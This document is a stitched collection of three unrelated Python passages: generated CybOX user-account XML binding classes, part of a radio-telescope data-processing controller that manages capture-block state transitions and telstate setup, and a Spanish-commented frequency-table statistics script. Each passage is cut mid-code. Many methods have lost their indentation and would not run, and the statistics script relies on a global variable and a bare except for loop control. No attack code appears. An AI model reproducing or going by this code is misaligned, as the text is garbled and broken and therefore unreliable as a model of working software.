            outfile.write('User_ID=%s,\n' % quote_python(self.User_ID).encode(ExternalEncoding))
        if self.Full_Name is not None:
            showIndent(outfile, level)
            outfile.write('Full_Name=%s,\n' % quote_python(self.Full_Name).encode(ExternalEncoding))
        if self.Group_List is not None:
            showIndent(outfile, level)
            outfile.write('Group_List=model_.GroupListType(\n')
            self.Group_List.exportLiteral(outfile, level, name_='Group_List')
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.Home_Directory is not None:
            showIndent(outfile, level)
            outfile.write('Home_Directory=%s,\n' % quote_python(self.Home_Directory).encode(ExternalEncoding))
        if self.Last_Login is not None:
            showIndent(outfile, level)
            outfile.write('Last_Login=%s,\n' % quote_python(self.Last_Login).encode(ExternalEncoding))
        if self.Privilege_List is not None:
            showIndent(outfile, level)
            outfile.write('Privilege_List=model_.PrivilegeListType(\n')
            self.Privilege_List.exportLiteral(outfile, level, name_='Privilege_List')
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.Script_Path is not None:
            showIndent(outfile, level)
            outfile.write('Script_Path=%s,\n' % quote_python(self.Script_Path).encode(ExternalEncoding))
        if self.Username is not None:
            showIndent(outfile, level)
            outfile.write('Username=%s,\n' % quote_python(self.Username).encode(ExternalEncoding))
        if self.User_Password_Age is not None:
            showIndent(outfile, level)
            outfile.write('User_Password_Age=%s,\n' % quote_python(self.User_Password_Age).encode(ExternalEncoding))
    def build(self, node):
        # Populates this object from an ElementTree/lxml element node.
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            # Strip the namespace from the tag to get the local element name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('password_required', node)
if value is not None and 'password_required' not in already_processed:
already_processed.append('password_required')
if value in ('true', '1'):
self.password_required = True
elif value in ('false', '0'):
self.password_required = False
else:
raise_parse_error(node, 'Bad boolean attribute')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatches each child element to the matching factory; unknown tags
        # fall through to the superclass at the end.
        if nodeName_ == 'User_ID':
            User_ID_ = common.StringObjectAttributeType.factory()
            User_ID_.build(child_)
            self.User_ID = User_ID_
        elif nodeName_ == 'Full_Name':
            Full_Name_ = common.StringObjectAttributeType.factory()
            Full_Name_.build(child_)
            self.Full_Name = Full_Name_
        elif nodeName_ == 'Group_List':
            obj_ = GroupListType.factory()
            obj_.build(child_)
            self.set_Group_List(obj_)
        elif nodeName_ == 'Home_Directory':
            Home_Directory_ = common.StringObjectAttributeType.factory()
            Home_Directory_.build(child_)
            self.Home_Directory = Home_Directory_
        elif nodeName_ == 'Last_Login':
            Last_Login_ = common.DateTimeObjectAttributeType.factory()
            Last_Login_.build(child_)
            self.Last_Login = Last_Login_
        elif nodeName_ == 'Privilege_List':
            obj_ = PrivilegeListType.factory()
            obj_.build(child_)
            self.set_Privilege_List(obj_)
        elif nodeName_ == 'Script_Path':
            Script_Path_ = common.StringObjectAttributeType.factory()
            Script_Path_.build(child_)
            self.Script_Path = Script_Path_
        elif nodeName_ == 'Username':
            Username_ = common.StringObjectAttributeType.factory()
            Username_.build(child_)
            self.Username = Username_
        elif nodeName_ == 'User_Password_Age':
            User_Password_Age_ = common.DurationObjectAttributeType.factory()
            User_Password_Age_.build(child_)
            self.User_Password_Age = User_Password_Age_
        super(UserAccountObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class UserAccountObjectType
class PrivilegeListType(GeneratedsSuper):
    """The PrivilegeListType type specifies the list of privileges that the
    user account has."""
    # generateDS.py-style generated binding; the export* methods emit XML and
    # Python-literal text whose exact formatting downstream tools rely on, so
    # the code is kept exactly as generated.
    subclass = None
    superclass = None
    def __init__(self, Privilege=None):
        # Privilege: list of PrivilegeType objects (fresh empty list by default).
        if Privilege is None:
            self.Privilege = []
        else:
            self.Privilege = Privilege
    def factory(*args_, **kwargs_):
        # Builds the registered subclass when one is installed, else this class.
        if PrivilegeListType.subclass:
            return PrivilegeListType.subclass(*args_, **kwargs_)
        else:
            return PrivilegeListType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Privilege(self): return self.Privilege
    def set_Privilege(self, Privilege): self.Privilege = Privilege
    def add_Privilege(self, value): self.Privilege.append(value)
    # NOTE(review): despite the name, this REPLACES the element at `index`
    # rather than inserting (standard generateDS behavior).
    def insert_Privilege(self, index, value): self.Privilege[index] = value
    def export(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeListType', namespacedef_=''):
        # Serializes this element (and children) as XML to `outfile`.
        showIndent(outfile, level)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='PrivilegeListType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='PrivilegeListType'):
        # This type has no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeListType', fromsubclass_=False):
        for Privilege_ in self.get_Privilege():
            Privilege_.export(outfile, level, namespace_, name_='Privilege')
    def hasContent_(self):
        # True when at least one Privilege child is present.
        if (
            self.Privilege
            ):
            return True
        else:
            return False
    def exportLiteral(self, outfile, level, name_='PrivilegeListType'):
        # Renders the object as Python constructor source (debug aid).
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('Privilege=[\n')
        level += 1
        for Privilege_ in self.Privilege:
            showIndent(outfile, level)
            outfile.write('model_.PrivilegeType(\n')
            Privilege_.exportLiteral(outfile, level, name_='PrivilegeType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        # Populates this object from an ElementTree/lxml element node.
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Privilege is abstract: the concrete class is chosen from the child's
        # xsi:type (or plain `type`) attribute and looked up in globals().
        if nodeName_ == 'Privilege':
            type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <Privilege> element')
            self.Privilege.append(obj_)
class PrivilegeType(GeneratedsSuper):
    """The PrivilegeType type specifies a specific privilege that a user
    has. This is an abstract type since user privileges are
    operating-system specific, and is extended as needed in the
    derived CybOX object schemas."""
    # generateDS subclass hook used by factory().
    subclass = None
    superclass = None
    def __init__(self):
        # Abstract type: carries no fields of its own.
        pass
    def factory(*args_, **kwargs_):
        # Build the registered subclass when one is installed, otherwise
        # this class itself.
        target_cls = PrivilegeType.subclass or PrivilegeType
        return target_cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def export(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeType', namespacedef_=''):
        # Serialize as XML; with no content this emits a self-closing tag.
        showIndent(outfile, level)
        opening = '<%s%s%s' % (
            namespace_, name_, ' ' + namespacedef_ if namespacedef_ else '')
        outfile.write(opening)
        self.exportAttributes(outfile, level, [], namespace_, name_='PrivilegeType')
        if not self.hasContent_():
            outfile.write('/>\n')
        else:
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            outfile.write('</%s%s>\n' % (namespace_, name_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='PrivilegeType'):
        # The abstract type defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeType', fromsubclass_=False):
        # The abstract type defines no child elements.
        pass
    def hasContent_(self):
        # Equivalent to the generated ``if ():`` test, which never matches.
        return False
    def exportLiteral(self, outfile, level, name_='PrivilegeType'):
        # Emit the object as Python-literal construction code.
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # Nothing to render in literal form.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        # Nothing to render in literal form.
        pass
    def build(self, node):
        # Populate this object from an ElementTree node.
        self.buildAttributes(node, node.attrib, [])
        for child_node in node:
            local_tag = Tag_pattern_.match(child_node.tag).groups()[-1]
            self.buildChildren(child_node, node, local_tag)
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes to parse.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse.
        pass
# end class PrivilegeType
class GroupListType(GeneratedsSuper):
"""The GroupListType type specifies the groups that the user account
belongs to."""
subclass = None
superclass = None
    def __init__(self, Group=None):
        # Group: list of group objects the user account belongs to.
        if Group is None:
            self.Group = []
        else:
            self.Group = Group
    def factory(*args_, **kwargs_):
        # Indirect constructor so applications can substitute a subclass.
        if GroupListType.subclass:
            return GroupListType.subclass(*args_, **kwargs_)
        else:
            return GroupListType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Accessors following the generateDS get/set/add/insert convention.
    def get_Group(self): return self.Group
    def set_Group(self, Group): self.Group = Group
    def add_Group(self, value): self.Group.append(value)
    def insert_Group(self, index, value): self.Group[index] = value
    def export(self, outfile, level, namespace_='UserAccountObj:', name_='GroupListType', namespacedef_=''):
        # Serialize this element as XML to outfile, indented by `level`.
        showIndent(outfile, level)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='GroupListType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='GroupListType'):
        # No XML attributes are defined for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='GroupListType', fromsubclass_=False):
        # Emit each group as a <Group> child element.
        for Group_ in self.get_Group():
            Group_.export(outfile, level, namespace_, name_='Group')
    def hasContent_(self):
        # True when there is at least one Group child to serialize.
        if (
            self.Group
            ):
            return True
        else:
            return False
    def exportLiteral(self, outfile, level, name_='GroupListType'):
        # Emit the object as Python-literal construction code.
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # No attributes to render in literal form.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        # Render the Group list as nested constructor calls.
        showIndent(outfile, level)
        outfile.write('Group=[\n')
        level += 1
        for Group_ in self.Group:
            showIndent(outfile, level)
            outfile.write('model_.GroupType(\n')
            Group_.exportLiteral(outfile, level, name_='GroupType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child | |
If there is a `depends_init` edge from A to B in the graph, A's
request will be made first if `reverse` is false, otherwise B's
request will be made first.
capture_block
The capture block is that being transitioned
"""
# Create a copy of the graph containing only dependency edges.
deps_graph = scheduler.subgraph(self.physical_graph, DEPENDS_INIT)
# Reverse it
if not reverse:
deps_graph = deps_graph.reverse(copy=False)
futures: Dict[object, asyncio.Future] = {} # Keyed by node
# Lexicographical tie-breaking isn't strictly required, but it makes
# behaviour predictable.
now = time.time() # Outside loop to be consistent across all nodes
for node in networkx.lexicographical_topological_sort(deps_graph, key=lambda x: x.name):
reqs: List[KatcpTransition] = []
try:
reqs = node.get_transition(state)
except AttributeError:
# Not all nodes are SDPPhysicalTask
pass
if reqs:
# Apply {} substitutions to request data
subst = dict(capture_block_id=capture_block.name,
time=now)
reqs = [req.format(**subst) for req in reqs]
deps = [futures[trg] for trg in deps_graph.predecessors(node) if trg in futures]
task = asyncio.get_event_loop().create_task(
self._exec_node_transition(node, reqs, deps, state, capture_block))
futures[node] = task
if futures:
# We want to wait for all the futures to complete, even if one of
# them fails early (to give the others time to do cleanup). But
# then we want to raise the first exception.
results = await asyncio.gather(*futures.values(), return_exceptions=True)
for result in results:
if isinstance(result, Exception):
raise result
    async def capture_init_impl(self, capture_block: CaptureBlock) -> None:
        """Start `capture_block`: record it in telstate, attach it to every
        SDP task in the graph, then drive the graph into CAPTURING state."""
        # telstate is set up during configure, so it must exist by now.
        assert self.telstate is not None
        await self.telstate.add('sdp_capture_block_id', capture_block.name)
        for node in self.physical_graph:
            if isinstance(node, tasks.SDPPhysicalTask):
                node.add_capture_block(capture_block)
        # reverse=True: per exec_transitions, dependency (depends_init) targets
        # receive their capture-init requests first.
        await self.exec_transitions(CaptureBlockState.CAPTURING, True, capture_block)
    async def capture_done_impl(self, capture_block: CaptureBlock) -> None:
        """Wind down `capture_block` by transitioning the graph to BURNDOWN."""
        await self.exec_transitions(CaptureBlockState.BURNDOWN, False, capture_block)
    async def postprocess_impl(self, capture_block: CaptureBlock) -> None:
        """Run the post-processing phase for `capture_block`.

        Builds a separate batch physical graph for post-processing, runs it
        through the batch queue, and finally (success or failure) records
        timing metrics and retires the capture block to DEAD.
        """
        assert self.telstate is not None
        try:
            await self.exec_transitions(CaptureBlockState.POSTPROCESSING, False, capture_block)
            capture_block.state = CaptureBlockState.POSTPROCESSING
            logical_graph = await generator.build_postprocess_logical_graph(
                capture_block.configuration, capture_block.name,
                self.telstate, self.telstate_endpoint)
            physical_graph = self._instantiate_physical_graph(
                logical_graph, capture_block.name)
            capture_block.postprocess_physical_graph = physical_graph
            nodes = {node.logical_node.name: node for node in physical_graph}
            # Point the batch graph's telstate placeholder at the already
            # running telstate task from the main graph.
            telstate_node = nodes['telstate']
            telstate_node.host = self.telstate_node.host
            telstate_node.ports = dict(self.telstate_node.ports)
            # This doesn't actually run anything, just marks the fake telstate node
            # as READY. It could block for a while behind real tasks in the batch
            # queue, but that doesn't matter because our real tasks will block too.
            # However, because of this blocking it needs a large resources_timeout,
            # even though it uses no resources.
            await self.sched.launch(physical_graph, self.resolver, [telstate_node],
                                    queue=self.batch_queue,
                                    resources_timeout=BATCH_RESOURCES_TIMEOUT)
            nodelist = [node for node in physical_graph if isinstance(node, scheduler.PhysicalTask)]
            await self.sched.batch_run(physical_graph, self.resolver, nodelist,
                                       queue=self.batch_queue,
                                       resources_timeout=BATCH_RESOURCES_TIMEOUT, attempts=3)
        finally:
            # Timing metrics are reported even if post-processing failed.
            init_time = capture_block.state_time[CaptureBlockState.CAPTURING]
            done_time = capture_block.state_time[CaptureBlockState.BURNDOWN]
            observation_time = done_time - init_time
            postprocessing_time = time.time() - done_time
            POSTPROCESSING_TIME.observe(postprocessing_time)
            logger.info('Capture block %s postprocessing finished in %.3fs (obs time: %.3fs)',
                        capture_block.name, postprocessing_time, observation_time,
                        extra=dict(capture_block_id=capture_block.name,
                                   observation_time=observation_time,
                                   postprocessing_time=postprocessing_time))
            # In unit tests the obs time might be zero, which leads to errors here
            if observation_time > 0:
                POSTPROCESSING_TIME_REL.observe(postprocessing_time / observation_time)
            await self.exec_transitions(CaptureBlockState.DEAD, False, capture_block)
def capture_block_dead_impl(self, capture_block: CaptureBlock) -> None:
for node in self.physical_graph:
if isinstance(node, tasks.SDPPhysicalTask):
node.remove_capture_block(capture_block)
    async def _launch_telstate(self) -> katsdptelstate.aio.TelescopeState:
        """Make sure the telstate node is launched.

        Launches the telstate task, seeds it with the initial configuration
        (graph-supplied values, CBF stream relationships, and canonical model
        URLs), then connects and returns an async telstate client.
        """
        boot = [self.telstate_node]
        # Start from any graph-supplied initial values; deep-copied so the
        # graph's own dict is not mutated below.
        init_telstate = copy.deepcopy(self.physical_graph.graph.get('init_telstate', {}))
        init_telstate['subarray_product_id'] = self.subarray_product_id
        init_telstate['config'] = self.physical_graph.graph.get(
            'config', lambda resolver: {})(self.resolver)
        # Provide attributes to describe the relationships between CBF streams
        # and instruments. This could be extracted from sdp_config, but these
        # specific sensors are easier to mock.
        for stream in self.configuration.streams:
            if isinstance(stream, product_config.CbfStream):
                init_telstate[(stream.name, 'instrument_dev_name')] = stream.instrument_dev_name
            if stream.src_streams:
                init_telstate[(stream.name, 'src_streams')] = [
                    src_stream.name for src_stream in stream.src_streams
                ]
        # Load canonical model URLs
        model_base_url = self.resolver.s3_config['models']['read']['url']
        if not model_base_url.endswith('/'):
            model_base_url += '/' # Ensure it is a directory
        init_telstate['sdp_model_base_url'] = model_base_url
        async with katsdpmodels.fetch.aiohttp.Fetcher() as fetcher:
            # RFI mask applies globally.
            rfi_mask_model_urls = await _resolve_model(
                fetcher, model_base_url, 'rfi_mask/current.alias')
            init_telstate[('model', 'rfi_mask', 'config')] = rfi_mask_model_urls[0]
            init_telstate[('model', 'rfi_mask', 'fixed')] = rfi_mask_model_urls[1]
            # Band-mask and primary-beam models are resolved per stream.
            for stream in itertools.chain(
                    self.configuration.by_class(product_config.AntennaChannelisedVoltageStream),
                    self.configuration.by_class(product_config.SimAntennaChannelisedVoltageStream)):
                ratio = round(stream.adc_sample_rate / 2 / stream.bandwidth)
                band_mask_model_urls = await _resolve_model(
                    fetcher, model_base_url,
                    f'band_mask/current/{stream.band}/nb_ratio={ratio}.alias'
                )
                prefix: Tuple[str, ...] = (stream.name, 'model', 'band_mask')
                init_telstate[prefix + ('config',)] = band_mask_model_urls[0]
                init_telstate[prefix + ('fixed',)] = band_mask_model_urls[1]
                for group in ['individual', 'cohort']:
                    # One primary-beam model URL per antenna, stored indexed.
                    config_value = _IndexedKey()
                    fixed_value = _IndexedKey()
                    for ant in stream.antennas:
                        pb_model_urls = await _resolve_model(
                            fetcher, model_base_url,
                            f'primary_beam/current/{group}/{ant}/{stream.band}.alias'
                        )
                        config_value[ant] = pb_model_urls[0]
                        fixed_value[ant] = pb_model_urls[1]
                    prefix = (stream.name, 'model', 'primary_beam', group)
                    init_telstate[prefix + ('config',)] = config_value
                    init_telstate[prefix + ('fixed',)] = fixed_value
        logger.debug("Launching telstate. Initial values %s", init_telstate)
        await self.sched.launch(self.physical_graph, self.resolver, boot)
        # connect to telstate store
        self.telstate_endpoint = '{}:{}'.format(self.telstate_node.host,
                                                self.telstate_node.ports['telstate'])
        redis_client = await aioredis.create_redis_pool(f'redis://{self.telstate_endpoint}')
        telstate_backend = katsdptelstate.aio.redis.RedisBackend(redis_client)
        telstate = katsdptelstate.aio.TelescopeState(telstate_backend)
        self.telstate = telstate
        self.resolver.telstate = telstate
        # set the configuration
        for k, v in init_telstate.items():
            # Tuple keys are joined into a single telstate key name.
            key = telstate.join(*k) if isinstance(k, tuple) else k
            if isinstance(v, _IndexedKey):
                # Indexed values are stored one sub-key at a time.
                for sub_key, sub_value in v.items():
                    await telstate.set_indexed(key, sub_key, sub_value)
            else:
                await telstate.set(key, v)
        return telstate
def check_nodes(self) -> Tuple[bool, List[scheduler.PhysicalNode]]:
"""Check that all requested nodes are actually running.
Returns
-------
result
True if all tasks are in state :const:`~scheduler.TaskState.READY`.
died
Nodes that have died unexpectedly (does not include nodes that we
killed).
.. todo::
Also check health state sensors
"""
died = []
result = True
for node in self.physical_graph:
if node.state != scheduler.TaskState.READY:
if node.state == scheduler.TaskState.DEAD and not node.death_expected:
died.append(node)
result = False
return result, died
def unexpected_death(self, task: scheduler.PhysicalTask) -> None:
logger.warning('Task %s died unexpectedly', task.name)
if task.logical_node.critical:
self._go_to_error()
def bad_device_status(self, task: scheduler.PhysicalTask) -> None:
logger.warning('Task %s has failed (device-status)', task.name)
if task.logical_node.critical:
self._go_to_error()
    def _go_to_error(self) -> None:
        """Switch to :const:`ProductState.ERROR` due to an external event.

        This is used when a failure in some task is detected asynchronously, but
        not when a katcp transition fails.
        """
        # Try to wind up the current capture block so that we don't lose any
        # data already captured. However, if we're in the middle of another
        # async operation we just let that run, because that operation is either
        # a deconfigure or it will notice the ERROR state when it finishes and
        # fail.
        #
        # Some of this code is copy-pasted from capture_done. Unfortunately
        # it's not straightforward to reuse the code because we have to do the
        # initial steps (particularly replacement of _async_task) synchronously
        # after checking async_busy, rather than creating a new task to run
        # capture_done.
        if self.state == ProductState.CAPTURING and not self.async_busy:
            assert self.current_capture_block is not None
            capture_block_id = self.current_capture_block.name
            logger.warning('Attempting to terminate capture block %s', capture_block_id)
            task = asyncio.get_event_loop().create_task(self._capture_done(error_expected=True))
            self._async_task = task
            log_task_exceptions(task, logger,
                                f"Failed to terminate capture block {capture_block_id}")
            # Done-callback: release the async-task slot and log completion.
            def cleanup(task):
                self._clear_async_task(task)
                logger.info('Finished capture block %s on subarray product %s',
                            capture_block_id, self.subarray_product_id)
            task.add_done_callback(cleanup)
        # We don't go to error state from CONFIGURING because we check all
        # nodes at the end of configuration and will fail the configure
        # there; and from DECONFIGURING/POSTPROCESSING we don't want to go to
        # ERROR because that may prevent deconfiguring.
        if self.state in (ProductState.IDLE, ProductState.CAPTURING):
            self.state = ProductState.ERROR
    async def _shutdown(self, force: bool) -> None:
        """Kill the entire physical graph.

        `force` is passed through to :meth:`sched.kill`; presumably it skips
        graceful shutdown of tasks — confirm against the scheduler docs.
        """
        # TODO: issue progress reports as tasks stop
        await self.sched.kill(self.physical_graph, force=force,
                              capture_blocks=self.capture_blocks)
async def configure_impl(self) -> None:
try:
try:
resolver = self.resolver
resolver.resources = SDPResources(self.master_controller, self.subarray_product_id)
# Register static KATCP sensors.
for ss in self.physical_graph.graph["static_sensors"].values():
self.add_sensor(ss)
# launch the telescope state for this graph
telstate = await self._launch_telstate()
# launch containers for those nodes that require them
await self.sched.launch(self.physical_graph, self.resolver)
alive, died = self.check_nodes()
# is everything we asked for alive
if not alive:
fail_list = ', '.join(node.logical_node.name for node in died) or 'Some nodes'
ret_msg = (f"{fail_list} failed to start. "
"Check the error log for specific details.")
logger.error(ret_msg)
raise FailReply(ret_msg)
# Record the TaskInfo for each task in telstate, as well as details
# about the image resolver.
details = {}
for task in self.physical_graph:
if isinstance(task, scheduler.PhysicalTask):
details[task.logical_node.name] = {
'host': task.host,
'taskinfo': _redact_keys(task.taskinfo, resolver.s3_config).to_dict()
}
await telstate.add('sdp_task_details', details, immutable=True)
await telstate.add('sdp_image_tag', resolver.image_resolver.tag, immutable=True)
await telstate.add('sdp_image_overrides', resolver.image_resolver.overrides,
immutable=True)
except BaseException as exc:
# If there was a problem the graph might be semi-running. Shut it all down.
await self._shutdown(force=True)
raise exc
except scheduler.InsufficientResourcesError as error:
raise FailReply('Insufficient resources to launch {}: {}'.format(
self.subarray_product_id, error)) from error
except scheduler.ImageError as error:
raise FailReply(str(error)) from | |
# <gh_stars>0
from cgi import print_arguments
from dataclasses import dataclass
import math
from operator import index
from pyexpat.errors import XML_ERROR_XML_DECL
from re import T
from typing import Tuple
import matplotlib.pyplot as plt
from numpy import percentile
import seaborn as sns
import pandas as pd
import random
# VALUES: the raw observations to analyse
dataSet = [0,2,3,4,5,11,12,13,14,15,16,17,18,19,21,21,21,21,21,23,23,23,23,23,25,25,25,25,25,26,26,26,26,26,29,29,29,29,29,35,35,35,35,35,35,35,35,35,35,36,36,36,36,36,36,36,36,36,36,36,31,31,31,31,31,31,31,31,31,31,32,32,41,41,41,41,41,42,42,42,42,42,45,45,45,45,45,46,46,46,46,46,48,48,48,48,48,48,51,52,53,54,55,56,57,60]
minV = 120; maxV = 200; n = 30
#dataSet = [random.randint(minV,maxV) for _ in range(n)]
# If you want random values, remove the "#" from the line above
UsarOpcion = False # Change to "True" (no quotes) to use the pre-filled-table option
# If you are already given the table, fill in these values:
#A = amplitude ; K = number of classes ("rows") of the table; ValorMinimo = first lower limit
A = 14; K = 6; ValorMinimo = 120
frecueciaAbsoluta = [7,5,5,5,4,4] # fill in the absolute frequencies
Percentiles = [n for n in range(1,101)]
class Stats:
def __init__(self,UsarOpcion,dataSet = []) -> None:
self.dataSet = dataSet
dataSet.sort()
self.NotificationLastInterval = False
self.WithoutNumbers = UsarOpcion
def getParameters(self,A = 0 , K = 0, valorMinimo = 0,frecueciaAbsoluta = []):
if self.WithoutNumbers == False:
self.maxVal = max(self.dataSet) # obtenemos el valor máximo
self.minVal = min(self.dataSet) # obtenemos el valor mínimos
self.R = self.maxVal - self.minVal # obtenemos rango
self.K = math.ceil(1+ 3.332*math.log10(len(self.dataSet))) # obtenemos intervalo de clase y lo redondeamos 1+ 3.332 * log10(n)
K = math.ceil(1+ 3.332*math.log10(len(self.dataSet)))
A = self.R / self.K # obtenemos amplitud R/K
# print((math.ceil(A) * K) + min(dataSet) > (max(dataSet) + 1))
if math.floor(A) * K + min(self.dataSet) > max(self.dataSet): # si redondeamos hacia abajo
self.A = math.floor(A)
elif math.ceil(A) * K + min(self.dataSet) > max(self.dataSet): # ceil case
self.A = math.ceil(A)
else:
self.A = math.ceil(A)
self.NotificationLastInterval = True
else:
self.minVal = valorMinimo
self.A = A
self.K = K
valorMaximo = valorMinimo + (A * K)
self.R = valorMaximo - valorMinimo
lenDataSet = sum(frecueciaAbsoluta)
dataSet = [n for n in range(lenDataSet)]
self.dataSet = dataSet
def getIntervals(self):
print(self.dataSet)
startingLim = self.minVal #seteamos limite inferior
self.intervalos = []
for _ in range(int(self.K)): #creamos K itervalos
limInf = startingLim
limSup = limInf + self.A #obtenemos limite superior sumando A a lim Inferior
startingLim = limSup # setemaos el nuevo limite inferior
self.intervaloActual = f"{limInf}-{limSup}"
self.intervalos.append([[limInf,limSup],0]) #array con el intervalo y su frecuencia absoluta
if self.NotificationLastInterval == True:
lastInterval = len(self.intervalos) - 1
self.intervalos[lastInterval][0][1] +=1
def getFrequency(self):
if self.WithoutNumbers == False:
self.freqNums = {} #diccionario con todos los numeros y sus frecuencias
# print(dataSet)
vals = list(set(dataSet)) # eliminamos repetidos y nos quedamos con los valores
vals.sort()
for val in vals:
self.freqNums[f"{val}"] = 0 # creamos diccionario por default frecuencia = 0
for n in dataSet:
self.freqNums[f"{n}"] += 1 # iteramos por los valores cada que encotramos un valor sumamos uno
# print(self.freqNums)
def marcaDeClase(self):
self.marcaDeClase = [ (intervalos[0][0] + intervalos[0][1])/ 2 for intervalos in self.intervalos ]
if self.NotificationLastInterval == True:
self.marcaDeClase[len(self.marcaDeClase) - 1] = (max(dataSet) + (max(dataSet) - self.A)) / 2
def analize(self,frecueciaAbsoluta = []):
if self.WithoutNumbers == False:
Finished = False #control vars
iterFreq = 0 #aumenta para obtener valores del diccionario de frecuencias self.freqNums = {}
iterIntervals = 0 #aumenta para llegar a un nuevo intervalo self.intervalos
freqVals = [int(k) for k,v in self.freqNums.items()] # obtenemos solo los numeros del diccionario self.freqNums = {}
intervals = [interval[0] for interval in self.intervalos] # obtenemos solo los intervalos del array self.intervalos
# print(intervals)
while Finished == False:
try:
currentInterval = intervals[iterIntervals] # obtenemos el intervalo con el que trabajamos en el ciclo
currentFeqVal = freqVals[iterFreq] # obtenemos el valor a comparar
if currentFeqVal >= currentInterval[0] and currentFeqVal < currentInterval[1]: # validation
freqCurrentVal = self.freqNums[f"{currentFeqVal}"] # unavez encontrada el intervalo correcto
# obtenemos la frecuencia de ese numero
# print(currentInterval,currentFeqVal,freqCurrentVal)
self.intervalos[iterIntervals][1] += freqCurrentVal # accedemos al intervalo acutal en el array self.intervalos y le sumamos
# la frecuencia del número actual
iterFreq += 1 # pasamos al siguiente valor
else: iterIntervals += 1 # si no se encuentra en ese intervalo avanzamos
except:
Finished = True
else:
for valor in range(len(self.intervalos)):
self.intervalos[valor][1] = frecueciaAbsoluta[valor]
def frecuenciaAcumalada(self):
cache = 0
freqAbs = [interval[1] for interval in self.intervalos]
self.frecuenciaAcumulada = []
for n in freqAbs:
cache += n
self.frecuenciaAcumulada.append(cache)
def FrecuenciaRelativa(self):
self.FrecuencieRelativa = []
N = len(self.dataSet)
for freq in [interval[1] for interval in self.intervalos]:
val = freq / N
self.FrecuencieRelativa.append(val)
def FrecuenciaPorcentual(self):
self.FrecuenciaPorcentual = []
for n in self.FrecuencieRelativa:
freq = n * 100
self.FrecuenciaPorcentual.append(freq)
def calcXF(self): #media
XF = []
for n in range(len(self.marcaDeClase)):
xfCurrentn = self.marcaDeClase[n] * self.intervalos[n][1]
XF.append(xfCurrentn)
X = sum(XF) / len(self.dataSet)
len(self.dataSet)
self.XF = XF
self.X = X
def calc2(self): # (X - Xi)**2 (marca de clase - media) ** 2
X_X2 = []
for n in self.marcaDeClase:
currentVal = (self.X - n)**2
X_X2.append(currentVal)
self.X_X2 = X_X2
def calc3(self): # (X - Xi)² * f
X_X2_F = []
for n in range(len(self.X_X2)):
currentVal = self.X_X2[n] * self.intervalos[n][1]
X_X2_F.append(currentVal)
self.X_X2_F = X_X2_F
def calquartils(self):
quartils = {}
for q in range(1,5):
first = (q*len(self.dataSet))/4
if first in self.frecuenciaAcumulada:
valor = self.frecuenciaAcumulada.index(first)
quartil = self.intervalos[valor][0]
quartils[f"{q}"] = quartil[1] #limite superior
else:
